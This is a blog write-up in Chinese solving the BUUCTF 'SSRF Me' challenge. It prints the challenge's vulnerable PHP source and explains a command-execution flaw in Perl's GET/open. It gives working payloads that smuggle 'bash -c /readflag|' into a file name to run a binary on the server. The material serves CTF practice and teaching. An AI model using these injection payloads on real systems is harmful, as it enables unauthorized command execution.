[BUUCTF]SSRF Me

最新推荐文章于 2024-05-28 22:13:30 发布
最新推荐文章于 2024-05-28 22:13:30 发布
阅读量360 收藏
点赞数
分类专栏: CTF 文章标签: perl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dannie01/article/details/120688465
版权

源码

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

函数学习:

explode() 把字符串打散为数组
mkdir() 创建目录
chdir() 切换目录

basename() 函数返回路径中的文件名部分
pathinfo() 函数以数组的形式返回关于文件路径的信息。
返回的数组元素如下:
[dirname]: 目录路径
[basename]: 文件名
[extension]: 文件后缀名
[filename]: 不包含后缀的文件名

代码分析:

  • 输出当前页面用户的ip
  • 构建md5处理过的目录,切换到当前目录
  • 执行GET拼接shell命令,内容可控
  • 将可控内容写入到可控文件中

一开始以为是escapeshellarg,但其实是

perl get 命令执行漏洞

思路:

调用命令GET来执行从url获取的参数, 然后按照filename新建文件,写入GET的结果。

知识点:

bash -c “cmd string” 命令
perl脚本GET open命令漏洞
GET是Lib for WWW in Perl中的命令
目的是模拟http的GET请求,GET函数底层就是调用了open处理
open存在命令执行,并且还支持file函数

  • 先创123文件查看根目录

创建
poc1

?url=/&filename=123

poc2

?url=file:///filename=123

访问

url/sandbox/MD5(orange+ip)/123

在这里插入图片描述
发现flag和readflag,读了发现flag不可见,readflag是执行文件,那么思路就很清晰了

  • 运行readflag文件读取flag

首先得满足前面的文件存在, 才会继续到open语句, 所以在执行命令前得保证有相应的同名文件:

?url=&filename=bash -c /readflag| 先新建一个名为“bash -c /readflag|”的文件,用于之后的命令执行

?url=file:bash -c /readflag|&filename=111 再利用GET执行bash -c /readflag保存到111文件

访问

url/sandbox/MD5(orange+ip)/111

深层次学习perl
https://www.jianshu.com/p/3f82685f56a8

J1A
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-[De1CTF 2019]SSRF Me
weixin_43345082的博客
12-30 1044
打开页面就是源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefault...
BUUCTF WEB SSRF ME
qq_41696858的博客
03-11 3303
这题没啥好说的,简简单单一个命令执行漏洞 10.244.80.46<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_AD
ssrf刷题——buu [第二章 web进阶]SSRF Training [网鼎杯 2020 玄武组]SSRFMe
最新发布
m0_73756016的博客
05-28 1514
需要用到的工具。
buuctf [De1CTF 2019]SSRF Me
qq_52671379的博客
04-19 1015
buuctf [De1CTF 2019]SSRF Me
[BUUCTF][De1CTF 2019]SSRF Me
cosmoslin的博客
11-18 385
考点 读取文件的特殊方法 哈希扩展 解题 提示:flag is in ./flag.txt 直接给出源码,flask框架 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaulten
BUUCTF:[De1CTF 2019]SSRF Me
末初的CSDN博客
04-24 1019
https://buuoj.cn/challenges#[De1CTF%202019]SSRF%20Me 源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencodi
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
WebLogic SSRF 及漏洞修复
11-25
### WebLogic SSRF 及其漏洞修复方法 #### 一、背景介绍 WebLogic SSRF(Server Side Request Forgery)是一种网络安全漏洞,攻击者可以通过控制Web应用去发起针对内网或者外网的服务请求,实现对目标系统的攻击。...
SSRF bible. Cheatsheet
08-06
SSRF bible. Cheatsheet SSRF attack and sockets presentation.
第一节 SSRF原理介绍-01
09-15
SSRF漏洞原理介绍 SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: ...
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器的网络权限发起对外部资源的请求。在这个场景中,通过时间延迟的判断方法,攻击者能够探测内网中的某些...
[De1CTF 2019]SSRF Me | BUUCTF
qq_56313338的博客
09-09 900
本题有多种解法:拼接字符串或者哈希长度拓展攻击
buuctf [网鼎杯 2020 玄武组]SSRFMe
qq_52671379的博客
04-23 3481
buuctf [网鼎杯 2020 玄武组]SSRFMe
BUUCTF [De1CTF 2019]SSRF Me 1
weixin_45642610的博客
03-04 529
BUUCTF [De1CTF 2019]SSRF Me 1 把代码整理,添上一些注释 #! /usr/bin/env python # encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1')
web buuctf [De1CTF 2019]SSRF Me
weixin_44214568的博客
04-03 1201
打开是一团代码, 整理后: ! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) secert_k
BUUCTF WEB [De1CTF 2019]SSRF Me
A_dmin的博客
12-20 3661
BUUCTF WEB [De1CTF 2019]SSRF Me 不得不说buuctf是个好网站,很多比赛的题目都有复现!! 题目给了源码: #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urlli...
2021-10-14 buuctf SSRFme
shallowskyandsea的博客
10-14 224
SSRFme 打开题目,审计代码 前面一段会返回我们的IP,然后会将"orange"和我们的IP拼接后进行MD5加密 通过url参数输入的内容会以GET命令执行, 执行结果会被存入以filename参数的值命名的文件里 构造读取根目录并创建文件a Payload:/?url=/&filename=a Md5加密后的orange+IP:2ba7fe56ffb251699ec6e09ae00f2e87 查看文件 /sandbox/2ba7fe56ffb251699ec6e09.
[HITCON 2017]SSRFme ctf web buuctf
wuyaowangchuan的博客
11-12 516
<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $sandbox = "sandbox/..
[de1ctf 2019]ssrf me 1
03-16
[de1ctf 2019]ssrf me 1 是一道关于SSRF的题目。它的目标是通过利用SSRF漏洞,访问位于内部网络中的一个HTTP服务,从而获取flag。 具体来说,题目中提供了一个Web应用程序,该应用程序允许用户输入一个URL,然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值